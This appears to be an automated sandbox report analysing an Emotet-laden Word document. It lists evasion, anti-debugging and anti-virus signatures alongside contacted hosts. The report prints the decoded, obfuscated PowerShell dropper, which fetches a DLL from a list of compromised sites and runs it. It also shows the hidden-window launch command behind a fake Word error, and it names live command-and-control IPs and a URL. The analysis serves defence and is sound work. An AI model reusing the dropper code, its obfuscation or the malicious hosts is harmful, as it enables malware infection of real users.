Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3403
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5411
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116 Thread sleep count: 3403 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116 Thread sleep count: 5411 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7152 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6476 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100272AB FindFirstFileExW,FindNextFileW,FindClose, 13_2_100272AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10026EEF FindFirstFileExW, 13_2_10026EEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343109C FindFirstFileW, 14_2_0343109C
Source: svchost.exe, 00000008.00000002.470041272.0000016077229000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW ?
Source: powershell.exe, 00000004.00000002.290693155.0000018A2C379000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWBW%SystemRoot%\system32\mswsock.dllAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQBy
Source: powershell.exe, 00000004.00000002.291408602.0000018A2C750000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.266721454.000001BB69A70000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.284405222.0000029CB6290000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.470431975.000001DF15C70000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000008.00000002.471798450.000001607CA62000.00000004.00000001.sdmp Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000008.00000002.471730636.000001607CA4C000.00000004.00000001.sdmp, rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.291408602.0000018A2C750000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.266721454.000001BB69A70000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.284405222.0000029CB6290000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.470431975.000001DF15C70000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000004.00000002.291408602.0000018A2C750000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.266721454.000001BB69A70000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.284405222.0000029CB6290000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.470431975.000001DF15C70000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.469952120.0000013F54829000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000004.00000002.291408602.0000018A2C750000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.266721454.000001BB69A70000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.284405222.0000029CB6290000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.470431975.000001DF15C70000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10001E91 Control_RunDLL,LoadLibraryA,LoadLibraryA,LoadLibraryA,_strlen,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrAccessResource,WriteFileGather,VirtualAlloc,MessageBoxA, 13_2_10001E91
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1000E144 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_1000E144
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10026594 mov eax, dword ptr fs:[00000030h] 13_2_10026594
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100265D7 mov eax, dword ptr fs:[00000030h] 13_2_100265D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1002661A mov eax, dword ptr fs:[00000030h] 13_2_1002661A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001065E mov eax, dword ptr fs:[00000030h] 13_2_1001065E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10026675 mov eax, dword ptr fs:[00000030h] 13_2_10026675
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1002673B mov eax, dword ptr fs:[00000030h] 13_2_1002673B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1002677F mov eax, dword ptr fs:[00000030h] 13_2_1002677F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100267C3 mov eax, dword ptr fs:[00000030h] 13_2_100267C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100267F4 mov eax, dword ptr fs:[00000030h] 13_2_100267F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BC4FF mov eax, dword ptr fs:[00000030h] 13_2_041BC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343C4FF mov eax, dword ptr fs:[00000030h] 14_2_0343C4FF
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1000288D GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,VirtualAlloc,und_memcpy,SetLastError,SetLastError, 13_2_1000288D
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1000E144 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_1000E144
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10004171 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_10004171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10003EE0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_10003EE0

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 152.170.79.100 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 190.247.139.101 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 138.197.99.250 144
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded $U6351=[TYpE]("{2}{0}{1}{4}{3}{5}" -F 'ySTEm.i','O.di','s','EcTO','R','RY') ;$OLV = [tYpe]("{0}{7}{1}{8}{3}{6}{5}{2}{4}" -F'sY','TEm.NE','ntmAN','v','AGeR','I','iCePO','s','T.seR') ; $ErrorActionPreference = ('Si'+('le'+'n')+'t'+('ly'+'C')+('onti'+'n'+'ue'));$Ytd_ppb=$H4_L + [char](64) + $Q01Q;$E15N=(('O'+'1_')+'V'); ( geT-VaRiable u6351 -VaLUEoNLy )::"cRE`ATedIr`eC`Tory"($HOME + (('{0}N'+('sgh'+'o')+'ht{0}'+'G'+'b'+('h5r'+'9o')+'{0}') -f [cHaR]92));$N95W=(('S'+'28')+'S'); ( Ls vArIABle:olV).VAlUE::"SECUr`ITY`PrOTO`coL" = ('Tl'+('s1'+'2'));$K_2L=('B6'+'7O');$Bexo28t = ('Q2'+'7V');$M69N=(('U'+'72')+'A');$Zc7n7y_=$HOME+(('{'+'0'+'}'+('N'+'sg')+'hoht{0}'+'G'+('b'+'h5r')+'9o{0}') -F[CHAR]92)+$Bexo28t+('.d'+'ll');$N_1W=(('M'+'34')+'Y');$Ile_vaa=(']'+('b2'+'['+'s://w'+'heel')+'co'+'mo'+'vi'+('n'+'g.co'+'m/p')+'/R'+'u'+'M'+('eRP'+'a')+'/@'+(']'+'b2[s:/')+('/'+'00')+'z'+('y'+'ku')+'.'+'co'+('m/w'+'p'+'-admin/'+'e')+('Yu1'+'Q/')+'@]'+'b'+('2['+'s://k')+('e'+'tore')+('se'+'tm')+('e'+'.com')+'/w'+'p'+('-'+'cont')+('e'+'nt/pmJ')+'/'+('@'+']b')+'2'+('['+'ss:/'+'/')+('ryco'+'m')+'p'+('ut'+'e')+'r.'+('com/c'+'on')+('ten'+'t/T')+('L/@]'+'b'+'2[s'+'s')+(':'+'//')+'d-'+('c'+'em'+'.com')+'/'+'wp'+('-a'+'d')+('m'+'in')+'/'+('J'+'SLwG1')+('/@]b2[s'+':'+'/')+'/'+('thebes'+'t')+'f'+('ikra'+'h.'+'co')+'m'+('/wp-'+'adm'+'i'+'n/')+('f'+'OIl'+'VX/@')+(']b2'+'[')+('ss:/'+'/')+('ph'+'aw')+('aya'+'ge')+'n'+('cy'+'.com/')+'w'+'p'+('-'+'ad')+'mi'+'n'+('/'+'mXo')+'4b'+'/')."rep`L`ACE"(((']b'
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $U6351=[TYpE]("{2}{0}{1}{4}{3}{5}" -F 'ySTEm.i','O.di','s','EcTO','R','RY') ;$OLV = [tYpe]("{0}{7}{1}{8}{3}{6}{5}{2}{4}" -F'sY','TEm.NE','ntmAN','v','AGeR','I','iCePO','s','T.seR') ; $ErrorActionPreference = ('Si'+('le'+'n')+'t'+('ly'+'C')+('onti'+'n'+'ue'));$Ytd_ppb=$H4_L + [char](64) + $Q01Q;$E15N=(('O'+'1_')+'V'); ( geT-VaRiable u6351 -VaLUEoNLy )::"cRE`ATedIr`eC`Tory"($HOME + (('{0}N'+('sgh'+'o')+'ht{0}'+'G'+'b'+('h5r'+'9o')+'{0}') -f [cHaR]92));$N95W=(('S'+'28')+'S'); ( Ls vArIABle:olV).VAlUE::"SECUr`ITY`PrOTO`coL" = ('Tl'+('s1'+'2'));$K_2L=('B6'+'7O');$Bexo28t = ('Q2'+'7V');$M69N=(('U'+'72')+'A');$Zc7n7y_=$HOME+(('{'+'0'+'}'+('N'+'sg')+'hoht{0}'+'G'+('b'+'h5r')+'9o{0}') -F[CHAR]92)+$Bexo28t+('.d'+'ll');$N_1W=(('M'+'34')+'Y');$Ile_vaa=(']'+('b2'+'['+'s://w'+'heel')+'co'+'mo'+'vi'+('n'+'g.co'+'m/p')+'/R'+'u'+'M'+('eRP'+'a')+'/@'+(']'+'b2[s:/')+('/'+'00')+'z'+('y'+'ku')+'.'+'co'+('m/w'+'p'+'-admin/'+'e')+('Yu1'+'Q/')+'@]'+'b'+('2['+'s://k')+('e'+'tore')+('se'+'tm')+('e'+'.com')+'/w'+'p'+('-'+'cont')+('e'+'nt/pmJ')+'/'+('@'+']b')+'2'+('['+'ss:/'+'/')+('ryco'+'m')+'p'+('ut'+'e')+'r.'+('com/c'+'on')+('ten'+'t/T')+('L/@]'+'b'+'2[s'+'s')+(':'+'//')+'d-'+('c'+'em'+'.com')+'/'+'wp'+('-a'+'d')+('m'+'in')+'/'+('J'+'SLwG1')+('/@]b2[s'+':'+'/')+'/'+('thebes'+'t')+'f'+('ikra'+'h.'+'co')+'m'+('/wp-'+'adm'+'i'+'n/')+('f'+'OIl'+'VX/@')+(']b2'+'[')+('ss:/'+'/')+('ph'+'aw')+('aya'+'ge')+'n'+('cy'+'.com/')+'w'+'p'+('-'+'ad')+'mi'+'n'+('/'+'mXo')+'4b'+'/')."rep`L`ACE"(((']b'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD (base64-encoded command line omitted; the decoded script is shown under "Encrypted powershell cmdline option found" above)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD (base64-encoded command line omitted; the decoded script is shown under "Encrypted powershell cmdline option found" above)
Source: rundll32.exe, 0000000E.00000002.470861626.0000000003830000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 0000000E.00000002.470861626.0000000003830000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 0000000E.00000002.470861626.0000000003830000.00000002.00000001.sdmp Binary or memory string: Progman
Source: rundll32.exe, 0000000E.00000002.470861626.0000000003830000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10003D00 cpuid 13_2_10003D00
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 13_2_1002A1D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 13_2_100303BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 13_2_10030661
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 13_2_100306CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 13_2_10029719
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 13_2_10030765
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 13_2_100298AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 13_2_10030B69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 13_2_10030D3E
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1002A210 GetSystemTimeAsFileTime, 13_2_1002A210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100012B1 GetVersionExA,CreateWindowExA,ShowWindow,UpdateWindow, 13_2_100012B1
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 00000013.00000002.469858560.00000251E1E3D000.00000004.00000001.sdmp Binary or memory string: @V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000013.00000002.469925075.00000251E1F02000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 0000000D.00000002.284787283.00000000029E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.470768632.0000000003410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.470794872.0000000003431000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.284845000.00000000041B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 14.2.rundll32.exe.3410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.3410000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.41b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.3430000.3.unpack, type: UNPACKEDPE
Behavior Graph ID: 336937 Sample: Informacion_29.doc Startdate: 07/01/2021 Architecture: WINDOWS Score: 100

Behavior graph (flattened from the rendered graph; the image itself is not reproduced here):

Top-level signatures: Multi AV Scanner detection for domain / URL; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 12 other signatures

Root processes started: cmd.exe; svchost.exe; WINWORD.EXE; 7 other processes
  cmd.exe: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found; PowerShell case anomaly found. Started powershell.exe, conhost.exe and msg.exe
  svchost.exe: Changes security center settings (notifications, updates, antivirus, firewall). Started MpCmdRun.exe, which started conhost.exe
  WINWORD.EXE: dropped C:\Users\user\...\Informacion_29.doc.LNK (MS)
  7 other processes: contacted 127.0.0.1 unknown unknown

powershell.exe: contacted rycomputer.com 58.97.195.135, 443, 49722 TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH Bangladesh; wheelcomoving.com 66.85.46.76, 49711, 80 HOST4GEEKS-LLCUS United States; 3 other IPs or domains. Dropped C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll (PE32). Signature: Powershell drops PE file. Started rundll32.exe

rundll32.exe: started rundll32.exe
  rundll32.exe (second): Hides that the sample has been downloaded from the Internet (zone.identifier). Started rundll32.exe
  rundll32.exe (third): contacted 152.170.79.100, 80 TelecomArgentinaSAAR Argentina; 190.247.139.101, 80 TelecomArgentinaSAAR Argentina; 138.197.99.250, 49755, 8080 DIGITALOCEAN-ASNUS United States. Signature: System process connects to network (likely due to code injection or exploit)

Contacted Public IPs

IP               Domain   Country        ASN     ASN Name                                    Malicious
66.85.46.76      unknown  United States  393960  HOST4GEEKS-LLCUS                            true
152.170.79.100   unknown  Argentina      10318   TelecomArgentinaSAAR                        true
58.97.195.135    unknown  Bangladesh     7470    TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH       true
190.247.139.101  unknown  Argentina      10318   TelecomArgentinaSAAR                        true
35.214.169.246   unknown  United States  19527   GOOGLE-2US                                  true
193.187.117.26   unknown  Netherlands    55933   CLOUDIE-AS-APCloudieLimitedHK               true
70.32.23.58      unknown  United States  55293   A2HOSTINGUS                                 true
138.197.99.250   unknown  United States  14061   DIGITALOCEAN-ASNUS                          true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
rycomputer.com 58.97.195.135 true
00zyku.com 193.187.117.26 true
wheelcomoving.com 66.85.46.76 true
d-cem.com 35.214.169.246 true
ketoresetme.com 70.32.23.58 true

Contacted URLs

Name: http://138.197.99.250:8080/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/
Malicious: true
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown